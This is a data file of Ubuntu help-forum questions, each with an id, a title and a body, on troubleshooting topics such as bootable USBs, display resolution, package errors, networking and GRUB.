447927	software center downloaded but not showing up	i recently downloaded the software center ( or so i thought ) , by typing in sudo apt-get install software-center . it seemed to go through the whole process , but at the end of it all i did n't see it in my folder . i 'm happy to do it again , but i 'm not sure if i need to . after downloading it , is there something else that i have to do to bring it up ?
447929	a reliable way of creating a bootable usb in kubuntu ?	unetbootin installs grub which then boots the system you specify . i do n't like that . linux live isos are directly bootable and usually contain a pre-configured grub install of their own which among other things , tends to work better . the dd command is the second most commonly recommended method of creating a bootable usb from an iso . honestly i would love it except for two things . first , i cant seem to make it work . second , i dont fully understand its use ( which may be a decent explanation for the first reason ) i have found a utility called `` rufus '' which works like a charm , every time . it only runs on windows , which i will never use again now that i have a workable understanding of linux . so is there another , 100 % reliable , way to create a bootable usb from an iso ? if nothing comes to mind , maybe some insight on the dd command could help ... edit : convoluted , excessively complex , and even c/c++ solutions are more than welcome ( i would n't mind coding my own utility )
447934	apt-get dist-upgrade screws up usb stick with persistent file	i have read the persistant file system vs installation onto usb stick and realized i have my own question . the problem is : when you do sudo apt-get update & & sudo apt-get dist-upgrade from usb stick , it becomes unusable because it installs new kernel and does n't properly update boot configuration . it boots to initramfs and stucks there . my only option is to reboot and recreate it again loosing my changes and time . i know i can use uck to update the iso which i write onto that usb but it is easier to update inside that usb and make some changes to boot files . so , how do i properly update once created usb stick with persistent file ?
447935	can not get full resolution with geforce 210	i have geforce 210 on ubuntu 13.10 connected with hdmi to a 29 aoc display . the display can do 2560x1080 resolution , the maximum resolution the video card can provide is 2560x1600 . however , the best i can get is 1920x1080 . how can i get 2560x1080 ? i have tried to switch the display drivers using software & update 's additional drivers feature , but changing the drivers makes no difference . the output of xrandr is : screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 673mm x 284mm 1920x1080 60.0*+ 59.9 50.0 30.0 60.0 50.0 1680x1050 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x960 60.0 1280x720 60.0 59.9 50.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x576 50.0 720x480 59.9 640x480 75.0 72.8 59.9 59.9
447936	how to disable `` remembered last login '' on lightdm ?	think there is 2 users on a ubuntu : user1 ( =admin ) , user2 . user2 logins to system and restarts it . it come up and user2 is selected for login , because he was who had last active session ! i want to make user1 as default in any case .
447939	openssl - sha256 ( base-64 ) using command line	i have to add hash total of a string to a file . hash total is sha-256 ( base-64 ) . string stream would be as below : transaction type|external system reference number|original external system reference|account title|sap company number|payment currency|payment amount|trade / posting date|settlement date|client account ( sap ) |client number ( sap ) |benficiarys bank sort code|beneficiarys bank swift code|beneficiarys bank line 1|beneficiarys bank line 2|intermediary bank|intermediary swift code|fx rate|beneficiary customer|beneficiary account number|beneficiaryâs bank country|resereved for future use|creation date / time|payment details|bank to bank info|payment charges|ordering customer|file origination code|resereved for future use|charge account|resereved for future use|resereved for future use|resereved for future use fcyout|testref000101||a company limited|gb0010001|eur|0000000663.75|20130327|20130402|10000001|90023562||sbzazajjxxx|standard bank joburg|sandton joburg||||john smith|1010102356|za||20130327163043|invoice 23b|branch code 234234|sha||xxxx||||| when i do hash total with below command echo -n $ txt | openssl dgst -binary -sha256 | openssl base64 it gives value as below : sql7nawq/y+2lxxflax25ctfsjoshy9+fcrzp5jcgo0= but when i send it to the other party they are getting wrong information after decrypt : they are expecting below encrypted string for the above sample message 1ejgezzixft+/qvxuuk1juo8rujguymrmunxga8oza8= can anyone please help me what is wrong here ? i want value to be same as the other party output .
447941	undoing gtk configuration change	i just followed the directions on this website which according to the page `` define gtk 2.0 layout . '' specifically , i followed the directions under `` easy fix , '' wherein i clicked launch gtk 2.0 rc wizard from the toolbar menu . unfortunately , i 'm not thrilled with the changes , but also am unsure as to how to undo them . icons and menu text have become very small and difficult to read on a high-res monitor . it also seems to have affected the size of icons and menu text on all applications , not just eclipse . any suggestions would be greatly appreciated . update : i just received a response from the author , here it is : hello andy ! gtk 2.0 configuration that is delivered with my theme does n't shrink size of icon . it only reduces paddings and margins . what if you do n't like my configuration you can edit ~/.gtkrc-2.0 file manually . you may need to refer https : //developer.gnome.org/gtk2/stable/gtk2-resource-files.html to modify that file . what if you want to just restore original settings of gtk2 , simply remove ~/.gtkrc-2.0 file . then restart your eclipse . cheers !
447943	ubuntu 12.04 authentication is broken	i 'm running ubuntu 12.04 lts on vm . it was fine till last friday . there were some updates available , some were related to security stuff , i do n't remember exactly . after that my system is broken . i ca n't login with my regular user . only guest login works . i went to recovery , after that i tried some instructions from , getting an `` authentication token manipulation '' error when trying to change my user password although i could n't reset password of due to error `` authentication token manipulation error '' , atleast i could login back with my regular user . but sudo stopped working , invalid password . i tried pkexec , which also fails with authentication error . could somebody please help ? otherwise i may have to reinstall the os . thanks in advance , psk
447947	best replacer for ubuntu one ?	so as we know ubuntu one is sadly getting shut down . i was really happy with ubuntu one . instantly syncing my files and with generous 5gb of storage ! now the question is , what software have you guys used to replace u1 ? i was using u1 on three devices ( my ubundu desktop , my mobile and my wifes mobile ) the instant syncing was really nice and it was really user friendly . any suggestions out there ? what are you using ? is dropbox the software to go with on this ? thanks on beforehand for any comments ! i greatly appreciate the help ( off-topic loving my ubuntu desktop and the community is just awesome ) ~beef
447948	crop tool with high resolution	i am now using shutter in ubuntu 13.10 for crop different selections and to select windows , but the problem is that the resolution is very low after i check it saving in all formats . please tell me software , that i can save crop selections and images in high resolution .
447951	how to convert mpeg to mp4 ?	i would like to convert an mpeg ts file to mp4 . is there software for ubuntu that i can buy that just works ? in 13.10 i did the following with success : edit the file with dvb-cut and export to mpg . then open the mpg in winff , select mp4 with high quality preset and convert but in 14.04 this fails with the following error : avconv version 9.11-6:9.11-2ubuntu2 , copyright ( c ) 2000-2013 the libav developers built on mar 24 2014 06:12:33 with gcc 4.8 ( ubuntu 4.8.2-17ubuntu1 ) [ mpeg @ 0x16f4d40 ] max_analyze_duration reached guessed channel layout for input stream # 0.1 : stereo guessed channel layout for input stream # 0.2 : mono input # 0 , mpeg , from '/home/magnus/desktop/car rescue.mpg ' : duration : 00:44:28.33 , start : 0.245800 , bitrate : 2352 kb/s stream # 0.0 [ 0x1e0 ] : video : mpeg2video ( main ) , yuv420p , 720x576 [ par 64:45 dar 16:9 ] , 9500 kb/s , 25 fps , 50 tbr , 90k tbn , 50 tbc stream # 0.1 [ 0x1c0 ] : audio : mp2 , 48000 hz , stereo , s16p , 192 kb/s stream # 0.2 [ 0x1c1 ] : audio : mp2 , 48000 hz , mono , s16p , 64 kb/s unknown encoder 'libvo_aacenc press enter to continue
447952	ubuntu repository security	i notice that ubuntu repositories is not https , all links in /etc/apt/source.list in http links . this is a peace of my repository links : deb http : //archive.ubuntu.com/ubuntu saucy main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy main restricted that means any one can edit or monitor the packages i installed is that right ?
447955	how to make a separate log file for bind service in rsyslog ?	i installed bind9 for name service on ubuntu12.04 . now for debugging its errors in name resolving . i need to make separate log file for it like /var/log/name.log . i searched too many for rsyslog , but as i search more and more , i mixed up in configurations . how can i make separate log file for bind service by rsyslog ?
447957	how would i go about manuall recreating the process that unetbootin uses to create a bootable usb ?	would i simply create a bootable grub install and copy the files from the iso over , then edit the commands as needed ?
447958	complete features of ubuntu 12.04 on usb without installing it on windows 7 laptop	i am new user and want to use complete features of ubuntu 12.04 without installing it on my laptop that has windows 7 os so that i became acquainted with ubuntu before switching to it . is it is possible through pen drive i.e . my pen drive will become ubuntu enabled just like my computer work with windows .
447959	sharing internet from usb 3g modem via netgear router using eth0	hi every one i had this working once and the old laptop has died and i need to do it again . i have 12.04 on a laptop and i am using a usb 3g modem for internet and wish to serve the connection out to everyone in family by using the old trusty wgr614 wireless router by a wired ethernet connection to router . i had to write a small scrip last time please help
447960	how to change operating system to ubuntu on a vps ?	apparently zimbra is supported and recommended for ubuntu 12.04 . unfortunately my os of choice , debian is not officially supported . so in order to upgrade and hence patch the much needed security additions it is necessary to change / upgrade the current operating system which is debian lenny ( 5 ) to ubuntu 12.04 . i am using a vps for the mail server and i 'm not sure if it is possible to change the os via an ssh session or if it is better to switch it on the vps providers manage page .
447961	how can i extract filesystem from vdi	i am trying to build linux from scratch . i ll install it into virtualbox . later i want to extract ext2 filesystem in it . is it possible ? edit : i want to extract root.ext2 filesystem in vdi , to mount it in ubuntu desktop environment and chroot into it . edit2 : moderators marked my topic as duplicate but it 's not duplicate of above mentioned topic at all . i found complete answer of my question . i post the link as a reference to people who seek the same answer : http : //www.turnkeylinux.org/blog/convert-vm-iso
447962	how can i install another operating system through maas ?	i want to install centos and microsoft windows server 2008 using maas . how can it be achieved ? i have already installed maas server on a single machine .
447963	settings pages does n't display properly after dist-upgrade	i added the main gnome ppa to get latest `` nautilus '' version . because ubuntu repository has old one . after dist-upgrade mouse cursor disappeared i already fix it . also settings page do not display properly . ubuntu picture on details windows has been gone and lots of windows has been transparent . although i set `` menus have icon '' with ubuntu tweak , menus have no icon . other pictures are here . ( http : //ow.ly/vnoxy ) or direct links : https : //i.imgur.com/alpzcgh.png https : //i.imgur.com/hmrlzs6.png https : //i.imgur.com/h64rrcl.png how can i fix ?
447969	ubuntu not boot up after installing and configuring mount manager	last day , i have installed mount manager from software center . then i did some setting , may i screwd up their , now ubuntu not booting up ! i tried to access via recovery mode . but it says ' mountall : mount/ 1768 : permission denied ' i am using ubuntu 12.04
447977	why is n't conky working right in unity desktop ?	first of all , my desktop environment is unity . i am using it with 14.04 os ( with all recent updates ) . i recently installed infinity conky . i installed and followed all the instructions correctly in the readme file provided with the conky . but my conky appears distorted , like this ( the background image is my own wallpaper ) : as you would have seen there are boxes after the fonts . the fonts seem to overlap from the last status rather than replacing it ( for example you can see the time ) . also if you look above the analog clock you will see a half visible icon . this means i also have a transparency issue . also when i run the conky in the terminal i see output as `` unknown varaiable '' . that output keeps on printing as you can see below : i attempted configuring the conky with help from the chat room yesterday . this is what i tried : changed the font to `` ubuntu '' disabled anti-aliasing both did not work . here is .conkyrc file ( it is without any edits ) . ps : i tried downloading conky manager from here but it is not available for 14.04 . note that i have conky , conkyall , curl installed . also is this just a problem with unity itself ? do n't unity and conky do n't go well with each other ? or is it because i am using a developer version os that i am being confronted with this problem ? update : - i noticed something recently . the conky does n't appear distorted when i start it from terminal . but the moment i minimize or close the terminal , or move to another workspace the conky gets distorted as mentioned above . i thought it was running from the terminal that caused the problem and so added the script to startup applications and rebooted . now the conky appeared without distortion but only until i opened a new window or moved to another workspace . thus the problem seems to me to be due to unity . but is it really ? if it is so , it is because of which particular aspect of unity and which file should i add when i submit a bug report about this ?
447978	is there a plugin for the terminal which allow to detect and open files ?	i 'm looking for a terminal plugin/extension that would allow me to detect files path in terminal output and open them in a text editor by clicking on them . the perfect solution would open the file at the given line . /home/dell/pcl/2d/include/pcl/2d/impl/keypoint.hpp:233 : warning : no uniquely matching class member found for void pcl : :keypoint : :imageelementmultiply ( imagetype & output , imagetype & input1 , imagetype & input2 ) in the example above i would be able to click on /home/dell/pcl/2d/include/pcl/2d/impl/keypoint.hpp:233 and i would open the file with gedit ( or whatever ) at line 233 .
447979	i have got some error in ubuntu update in ubuntu 13.10	i have got the error message , when i use update command in terminal . w : failed to fetch http : //ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . is there any solution how to remove that error , please help me .
447980	how to get lubuntu to forget wifi connection when new user logs in	my wifi works fine on my lubuntu system , but is there a way to make it forget the wifi login credentials after a user logs out ? i need other users to sign in with their own ( web authorization page- ) credentials if they login .
447981	how to change cloud location in deja-dup ?	i have recently created an account in surdoc cloud ( its a free account ) . i want to backup my home pc data to surdoc cloud using deja-dup backup . can anyone tell me what changes should i make to 'storage ' section of deja-dup-preferences to solve the issue ? i 'm using ubuntu 12.04 lts with lxde de . edit as i told in comment , after executing deja-dup-prefernces , there 's section called storage . in storage , there 's a subfield backup location which has several options of which only ssh , windows share or custom location should be chosen . of these which option should i choose and why ?
447987	install ubuntu 14.04 besides already existing ubuntu 12.04 with encrypted home	currently i have ubuntu 12.04 with encrypted home ( extra partition ) installed on my notebook . now i would like to install 14.04 on my ssd ( also inside my notebook ) . will 14.04 recognize my encrypted home ? any other things i should pay attention do ?
447988	open nfc compilation - g_pnalbinding error while compiling microread/hal_*	for generating the server application using aardvark , to access the nfcc , when i am entering make command in this directory : core/porting/linux/client_server/server/microread/hal_cc_client . objects/linux_porting_hal.o : in function pdriverreceivethread ' : /home/mca140/desktop/nfc/open nfc - 4.5.1/core/porting/linux/client_server/server/microread/hal_aardvark/linux_porting_hal.c:505 : undefined reference tog_pnalbinding ' objects/linux_porting_hal.o : in function getnalbinding ' : /home/mca140/desktop/nfc/open nfc - 4.5.1/core/porting/linux/client_server/server/microread/hal_aardvark/linux_porting_hal.c:608 : undefined reference tog_pnalbinding ' collect2 : error : ld returned 1 exit status make [ 1 ] : * [ server ] error 1 make [ 1 ] : leaving directory `/home/mca140/desktop/nfc/open nfc - 4.5.1/core/porting/linux/client_server/server/microread/hal_aardvark ' make : * [ check ] error 2 can you help me to solve the problem .
447989	problem in establishing account in empathy	i just downloaded empathy and added google and facebook accounts but it always shows 'disconnected-unspecified reasons ' . i am using ubuntu 12.04lts
447990	legacy grub on ubuntu 12.04	can i install / downgrade to legacy grub on ubuntu 12.04 ? i need it for a rackspace server .
447991	ca n't connect to internet on ubuntu	i have downloaded ubuntu for the first time and ca n't connect to the internet . please tell me how to go about to get wireless internet connection . i have ubuntu 12.04
447993	unable to connect to ubuntu from a remote machine	in my ubuntu i installed tomcat and deployed web application.i started tomcat and trying to access from windows like below : http : // < 54.85.125.1:8080 > /manager i am getting output like this : could not connect to 54.85.125.1:8080 then i executed sudo ufw enable command , to enable the firewall in ubuntu , but even though i am still unable to connect to remote machine . any one please help me i executed netstat -a in my cmd ubuntu @ ip-172-31-20-201 : ~ $ netstat -a active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 * : ssh * : * listen tcp 0 0 * : http * : * listen tcp 0 0 ip-172-31-20-201.ec : ssh mail.pagesolution:18414 established tcp 0 0 ip-172-31-20-201.ec : ssh mail.pagesolution:64067 established tcp 0 0 ip-172-31-20-201 . :58381 ec2-54-186-216-161:4505 established tcp 0 320 ip-172-31-20-201.ec : ssh mail.pagesolution:18178 established tcp 0 0 ip-172-31-20-201.ec : ssh mail.pagesolution:64065 established tcp6 0 0 [ : : ] : ssh [ : : ] : * listen tcp6 0 0 [ : : ] :8009 [ : : ] : * listen tcp6 0 0 [ : : ] : http-alt [ : : ] : * listen tcp6 0 0 localhost : http-alt localhost:43938 time_wait tcp6 0 0 ip6-localhost:51788 ip6-localhost:52644 time_wait tcp6 0 0 ip6-localhost:57361 ip6-localhost:57173 time_wait tcp6 0 0 localhost:8009 localhost:39078 time_wait tcp6 0 0 localhost:49296 localhost:8005 time_wait udp 0 0 * : bootpc * : * active unix domain sockets ( servers and established ) proto refcnt flags type state i-node path unix 2 [ acc ] stream listening 7432 /var/run/acpid.socket unix 2 [ acc ] stream listening 5867 @ /com/ubuntu/upstart unix 2 [ acc ] stream listening 7250 /var/run/dbus/system_bus_socket unix 8 [ ] dgram 7299 /dev/log unix 2 [ acc ] seqpacket listening 6070 /run/udev/control unix 2 [ acc ] stream listening 58324 /var/run/salt/minion/minion_event_0419609a49f1eec5f4394428f9cebbb5_pub.ipc unix 2 [ acc ] stream listening 58326 /var/run/salt/minion/minion_event_0419609a49f1eec5f4394428f9cebbb5_pull.ipc unix 3 [ ] stream connected 126113 unix 3 [ ] stream connected 126112 unix 3 [ ] stream connected 126092 unix 3 [ ] stream connected 126091 unix 2 [ ] dgram 125836 unix 2 [ ] dgram 125830 unix 3 [ ] stream connected 123313 unix 3 [ ] stream connected 123312 unix 2 [ ] dgram 123174 unix 3 [ ] stream connected 121839 unix 3 [ ] stream connected 121838 unix 2 [ ] dgram 121700 unix 2 [ ] dgram 11061 unix 3 [ ] stream connected 7570 /var/run/dbus/system_bus_socket unix 3 [ ] stream connected 7569 unix 2 [ ] dgram 7418 unix 3 [ ] stream connected 7276 /var/run/dbus/system_bus_socket unix 3 [ ] stream connected 7275 unix 3 [ ] stream connected 7274 unix 3 [ ] stream connected 7273 unix 3 [ ] stream connected 6557 @ /com/ubuntu/upstart unix 3 [ ] stream connected 6556 unix 3 [ ] dgram 6110 unix 3 [ ] dgram 6109 unix 3 [ ] stream connected 6045 @ /com/ubuntu/upstart unix 3 [ ] stream connected 6042 and executed ps -ax in ubuntu ubuntu @ ip-172-31-20-201 : ~ $ ps -ax 4479 ? s 0:00 /usr/sbin/apache2 -k start 4480 ? s 0:00 /usr/sbin/apache2 -k start 4481 ? s 0:00 /usr/sbin/apache2 -k start 4487 ? s 0:00 /usr/sbin/apache2 -k start 4579 ? s 0:00 /usr/sbin/apache2 -k start 17348 ? ss 0:17 /usr/sbin/apache2 -k start and also executed telnet localhost 8080 in ubuntu ubuntu @ ip-172-31-20-201 : ~ $ telnet localhost 8080 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . connection closed by foreign host . i dont have any file like /etc/init.d/tomcatx restart.i started server like below ubuntu @ ip-172-31-20-201 : ~ $ sudo /opt/apache-tomcat-7.0.53/bin/startup.sh using catalina_base : /opt/apache-tomcat-7.0.53 using catalina_home : /opt/apache-tomcat-7.0.53 using catalina_tmpdir : /opt/apache-tomcat-7.0.53/temp using jre_home : /usr using classpath : /opt/apache-tomcat-7.0.53/bin/bootstrap.jar : /opt/apache-tomcat-7.0.53/bin/tomcat-juli.jar tomcat started .
447995	balsa : fail to sync inbox	balsa mail client 2.4.10 ubuntu 11.10 after downloading 6000 messages ( around 2 gb ) from gmail , now it gives me error : error appending message '27 ' from pop.googlemail.com to inbox : data copy error how can i fix this ?
447998	where can i find the identifier of a computer to add as my friend in empathy ?	i have recently installed ubuntu 13.10 and i do n't know how to add a new contact . i press add a new contact , but i do n't know what to type in . thanks . ( my friend has a mac )
448000	help understanding failed boot logs	i am trying to understand why my vps server had a `` black out '' this morning . such black out lasted roughly 25 minutes , during this time i could n't even ssh into the server . we tried to remotely reboot the server from the vps control panel , to no avail . techinical support also tried to reboot it remotely but failed . the server then came back up after some time . i have been checking a number of files , located in /var/log what i notice by looking in `` messages '' file is these two lines : apr 15 08:50:27 pazienti-it kernel : kernel logging ( proc ) stopped . apr 15 09:14:23 pazienti-it kernel : imklog 4.2.0 , log source = /proc/kmsg started . notice that for quite some time , there was no logging there . also i then looked in `` syslog '' apr 15 08:50:27 pazienti-it init : hvc0 main process ( 854 ) killed by term signal apr 15 08:50:27 pazienti-it init : cron main process ( 513 ) killed by term signal apr 15 08:50:27 pazienti-it init : tty1 main process ( 856 ) killed by term signal apr 15 08:50:27 pazienti-it kernel : kernel logging ( proc ) stopped . apr 15 09:14:23 pazienti-it kernel : imklog 4.2.0 , log source = /proc/kmsg started . i see there the same behaviour . is there any way or any file where i can get some logging for what happened during that black out time ?
448001	ubuntu internet connection problem	i installed ubuntu on my laptop . here are my internet settings : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.1.17.10 /*this is my ip @ ddress*/ netmask 255.255.255.0 dns-nameservers 8.8.8.8 i can not connect to internet . i can ping 8.8.8.8 successfully but not any website . any help , please ? i can not access the internet this way .
448003	task bar at the top missing applications , places and system menu	i was trying to install vlc using system - > administration - > synaptic package manager when i realised that i do n't have applications , places and system menu items at the top left side of task bar . i am new to ubuntu but i intend to use it as a developer . i have installed ubuntu 13.10 which is gnome , as i checked using this command : ls /usr/bin/*session* which is not a menu item at the top left side of task bar . can i add them ? i will need them from time to time .
448004	ubuntu 13.10 network does n't work at all	i use ubuntuy 13.10 + gnome . when i load my laptop wired and wireless doest n't work at all . ifconfig showes me only loopback , i try to turn on my wi-fi using hotkeys on the keyboard , but it do n't help . i try ifup -a - nothing , sudo service netoworking restart - nothing
448009	how do i install ffmpeg ?	i need to install the package ffmpeg because i am trying to install subsonic server on my new ubuntu gnome 14.04 when i try : apt-get install ffmpeg i get : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ffmpeg : depends : libavcodec54 ( > = 7:1.2.5~ ) but it is not going to be installed or libavcodec-extra-54 ( > = 7:1.2.5~ ) but it is not going to be installed depends : libavdevice53 ( > = 7:1.2.5~ ) but it is not going to be installed depends : libavfilter3 ( > = 7:1.2.5~ ) but it is not going to be installed depends : libavformat54 ( > = 7:1.2.5~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have tried apt-get -f install ffmpeg apt-get install -- fix-broken apt-get autoclean apt-get autoremove with no luck at all . i found a repository and added it to my sources via : add-apt-repository ppa : jon-severinsson/ffmpeg with still no luck . i found this question is ffmpeg missing from the official repositories in 14.04 ? which led me to try this : apt-get install libav-tools which resulted in this : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libav-tools : depends : ffmpeg ( > = 7:0.10~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i also have made sure my `` software & updates '' have all the proper repositiories checked off , namely all 4 on the `` ubuntu software '' tab , and all on the `` other software '' tab with the exception of the second one ( canonical partners source code ) . i also have these checked off as well per instructions supplied on the page they lead to : http : //ppa.launchpad.net/jon-severinsson/ffmpeg/ubuntu saucy main http : //ppa.launchpad.net/jon-severinsson/ffmpeg/ubuntu trusty main none of this works . how can i install ffmpeg ? or if i can not install it , what do i need to install to replace its functionality ?
448010	does `` trusty tahr '' support efi ia32 ?	does `` trusty tahr '' ( ubuntu 14.04 ) supports ia32 booting ?
448013	problem installing lubuntu 13.10 [ kernel panic ]	hello ~ i 've had trouble installing lubuntu 13.10 [ 64bit ] from a usb drive . [ i used universal usb installer ] i boot from a usb drive , menu loads up and i can pick with arrow keys - but then as soon as i press enter [ doesnt matter if its to install or try before installing ] i get this error : '' [ 1.929082 ] kernel panic-not syncing vfs unable to mount root fs on unknown-block ( 0.0 ) '' things i 've already tried : -matching the md5sum for the iso and its alright . -formatting the usbdrive and reinstalling -tried on another computer and i get the same error
448015	what is a background process ?	i have always heard about background ( but not desktop background ) processes . but i do not understand what they really are . as an example , please look at the answer of this link what is technical difference between daemon , service and process ? i quote here : daemons - daemon ... they are the processes which run in the background and are not interactive . they have no controlling terminal ... what is their usage ? also are there any related commands to show processes running in background ?
448017	using ubuntu os as a thin client on machines for users to access and then remote onto a windows terminal server	i was wondering whether anyone had ever installed ubuntu os onto a vm and then used it as host system to enable users to login to a windows terminal server from it or if this is possible at all , any ideas etc would be greatly appreciated , i have tried start-up scripts to make the system boot straight to the ip of the windows server but this does n't seem to have worked . i needed to install various thin clients to demonstrate to the business , the easiest route was to create a number of vm 's and then install each thin client os onto them , i was hoping to install ubuntu os and then just configure it to boot straight to a windows terminal server which we already have in place here i first used the below script and created it in .sh , .desktop and .exe and added each file type simultaneously to the start-up applications list to see if the file type had an effect # ! /bin/bash # rdesktop 192.168. ? ? ? . ? ? -f # sudo /sbin.halt i also copied the file to the init.d folder and run the below commands in the terminal : sudo update-rc.d autorun.sh defaults sudo chmod +x /etc/init.d/autorun.sh sorry for the mixes up i am new to ubuntu and this forum .
448020	ca n't login using my login username and password	i have installed ubuntu 12.04 along side windows 8 . during the installation , i saved my username and password as required . when i boot , i see login screen . login and guest . when i login with my username and password , i keep getting invalid username and password . how can i fix this ?
448026	laptop freezes on battery dell inspiron 3521 - ubuntu 13.10 gnome shell 3.10	i am running ubuntu 13.10 , gnome shell - 3.10 on dell inspiron 3521 ( bought almost one year ago ) . initially it worked fine , but now laptop is suddenly freezing . nothing works then , no mouse , no keyboard , no ctrl+alt+f1 or anything . the only option left is rebooting . what i observed is it usually happens on battery . especially when i leave it off for a few minutes idle . i checked with dell and got to know that it 's not a hardware issue . has anyone else experienced the same ? thanks !
448032	printer canon pixma mp190 will not print or scan	i recently installed ubuntu 13.04 to replace windows xp . however i ca n't get my canon pixma mp190 to print or scan . i have downloaded drivers and printer icon appears . it then asks if i want to print a test page , but nothing happens and the job is stuck in a queue . how should i proceed to fix this problem ?
448040	os-prober and update-grub ca n't see/find working windows install	i have installed 12.04 next to a windows 7 install , on a partitioned 3 tb hard disk . if i use f12 during boot to review boot options from the bios , windows 7 and ubuntu boot normally , but the ubuntu grub only gives me ubuntu options . when i try os-prober , i get no results at all ; update-grub does n't do anything for me either . i 've tried modifying the grub using grub customizer , but , uh , do n't really understand the finer points of it . here 's a screenshot of the drive taken with disk utility . the first partition is windows , the second is shared data ( mp3s , documents , photos , etc. ) . the 105 mb fat is an `` efi system partition '' and the 134 mb `` unknown '' is labelled a `` microsoft reserved partition '' ; the 898 gb is ubuntu , and the final 5 gb is swap .
448045	how to make my maximum screen resolution to be detected by ubuntu ?	i just installed lubuntu 13.10 and i have a problem - on windows i can go up to 2048x1536 , but the display setting on lubuntu only lets me go up to 1024x768 . i already ran the update and upgrade , and the software thing shows no additional updates . my display is : intel g965 express [ no nvidia or amd graphics ]
448049	broken upgrade repair	yesterday i prepared to upgrade from ubuntu 12.10 to 13.10 , but something went wrong during the upgrade and my computer got restarted in the middle of the process ( at the point of installing packages ) . now i have a unusable state of system ( i still can use the command line version of ubuntu ) . how can i repair this state to fully upgrade to 13.10 without losing data ?
448058	ubuntu 12.04 suddenly very slow	for some reason , my ubuntu 12.04 recently became very slow . my specifications : hp laptop , core 2 duo t6600 , 2.20 ghz x2 ati radeon 2 gb ram symptoms in unity 3d : dash takes endless to open applications take a long time to open often screen freezes symptoms in unity 2d : same as above but less frequent what i already checked : driver is xserver tested hardware for 3d compatibility : i get for all positions `` yes '' , for both unity 3d and unity 2d when the problems occur : cpu load for both cpus about 25 % , which is not much ram swappiness = 10 ( changing the value not really matters ) ram is almost always on 90 % it is slow on all applications , but most problems occur when i try to open raw images from an external hard drive . i am really clueless what could be the reason . thx for your help eric
448060	black screen after 2nd/3rd boot on lubuntu on a sony vaio pcg-k25	i am trying to run lubuntu on my sony vaio pcg-k25 . it works on first boot but on second or third boot it will just be a black screen . here is the specs of the computer : ram:446mb processor : intel pentium 4 cpu 2.80ghz
448064	bash script for execute one command for many files	i just tried to clear my holiday video stuff and found program for stibilizng vision . there are a lot of files so i made script to stabilize all . firstly i need to run command : transcode -j stabilize -- mplayer_probe -i dscnxxx.mov i wrote a script for that but it is not working because stabilizing finishes after first file . i mean first file is done then it do not pass to second . the script looks like : for file in /media/przenoĺny/transcdoe/* do transcode -j stabilize -- mplayer_probe -i `` $ file '' > > results.out done its worth to add , when i cancel operation with ctrl+c script automaticly moves to next clip and so on .
448068	what is the exact time of ubuntu 14.04 release ?	please tell me what time on april 17 14.04 becomes available . i want to postpone buying a new laptop to the day before i can install 14.04 ( at 09:00 utc ) in the hope that my old one is found . rob
448076	how to create a virtual image for an existing system ?	i have a ubuntu os installed on a windows7 host . now , i want to create a virtual image of the ubuntu os from my system so that i can use it on other machines . i do n't even know if it possible . but , if it then could you please tell me the way to do that ? or point to the correct direction . any help would be greatly appreciated .
448077	what does the unity desktop integration extension do in firefox ?	i am using firefox 28.0 on ubuntu 13.10 . want to know what does the unity desktop integration extension do in firefox . then i can enable or disable it according to the use of it .
448083	keyboard shortcut to toggle touchpad	my problem is about if command . i have tried to type this in console : if gsettings get org.gnome.settings-daemon.peripherals.touchpad touchpad-enabled ; then gsettings set org.gnome.settings-daemon.peripherals.touchpad touchpad-enabled false ; else gsettings set org.gnome.settings-daemon.peripherals.touchpad touchpad-enabled true ; fi but this seems to disable the touchpad although it is yet disabled . typing help if i have learned that the commands after the word then are executed when the output of the command after the word if is 0 ( instead of true , as usual in other programming lenguages ) . how can i write a command that toggles the touchpad then ?
448084	no volume popup on media key press	i have this problem with ubuntu gnome 14.04 : whenever i press the volume buttons to change it , it works and i even hear a sound ( that `` bop '' like sound ) , but i do n't see the volume popup indicating the level . it used to work , but one day it decided to go away for some reason . just to let you know , i 'm also using the gnome3 ppa .
448085	gmusicbrowser does not let me bind fn key	im trying to bind the play/pause button to fn+down but it only lets me put down
448087	how do i configure a machine to respond or not respond to ping requests ?	how can i manage my ubuntu machine so it does n't ( or does ) respond to ping ( icmp echo_request - type 8 ) requests ? normally almost all computers in a lan network respond to ping with an icmp echo_reply , but how to turn it off ? how to manage it ? how to manage other types of icmp requests ?
448089	docky is closing when i plug/unplug the ac cable	every time i plug/unplug the power cable docky is closing . this thing is happening since i have updated to 14.04 , also , my battery life seems to be shorter . i am using a toshiba satellite c55-a-1px .
448093	ubuntu on old mac mini 1.42 ghz /512/ ?	i 'm totally new in this subject ... is there a possibility to install ubuntu on an old mac mini 1.42 ghz | 512 | without intel processor ? if not does anybody have an idea for another system/os ?
